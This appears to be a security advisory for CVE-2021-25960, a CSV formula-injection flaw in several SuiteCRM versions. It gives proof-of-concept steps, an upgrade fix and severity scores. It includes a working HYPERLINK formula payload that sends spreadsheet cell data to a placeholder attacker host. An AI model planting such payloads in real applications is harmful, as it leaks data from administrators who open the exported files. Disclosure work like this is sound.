We found results for “”
CVE-2021-25960
Date: September 29, 2021
Overview
In “SuiteCRM” application, v7.11.18 through v7.11.19 and v7.10.29 through v7.10.31 are affected by “CSV Injection” vulnerability (Formula Injection). A low privileged attacker can use accounts module to inject payloads in the input fields. When an administrator access accounts module to export the data as a CSV file and opens it, the payload gets executed. This was not fixed properly as part of CVE-2020-15301, allowing the attacker to bypass the security measure.Details
The application “SuiteCRM” is affected by “CSV Injection” vulnerability (Formula Injection). A low privileged user (attacker) can use the accounts module to inject payloads in the input fields. When an administrator accesses the accounts module to export the data as a CSV file and opens it, the payload gets executed.PoC Details
For demonstration purposes we'll use 2 users -1. Alice - low privileged user
2. Admin - administrator
Login into the application as Alice and go to the accounts module. Now in the first name field, insert the CSV injection payload.
Start listener on port 4444.
Then login into the application as Admin and navigate to the accounts module. Select the fields and under Bulk Action click on export. A CSV file will be downloaded. Open it with excel.
When Admin clicks on the first column that contains the payload, it gets executed and the data in cells A3 & B3 will be sent to Alice’s address.
PoC Code
==HYPERLINK("http://attacker-ip:4444?x="&A3&B3,"Click Here")
Affected Environments
v7.11.18 - v7.11.19 and v7.10.29 - v7.10.31Prevention
Upgrade to version v7.10.32, v7.11.21 or higherLanguage: PHP
Good to know:
Base Score: |
|
---|---|
Attack Vector (AV): | Network |
Attack Complexity (AC): | Low |
Privileges Required (PR): | Low |
User Interaction (UI): | Required |
Scope (S): | Unchanged |
Confidentiality (C): | High |
Integrity (I): | High |
Availability (A): | High |
Base Score: |
|
---|---|
Access Vector (AV): | Network |
Access Complexity (AC): | Medium |
Authentication (AU): | Single |
Confidentiality (C): | Partial |
Integrity (I): | Partial |
Availability (A): | Partial |
Additional information: |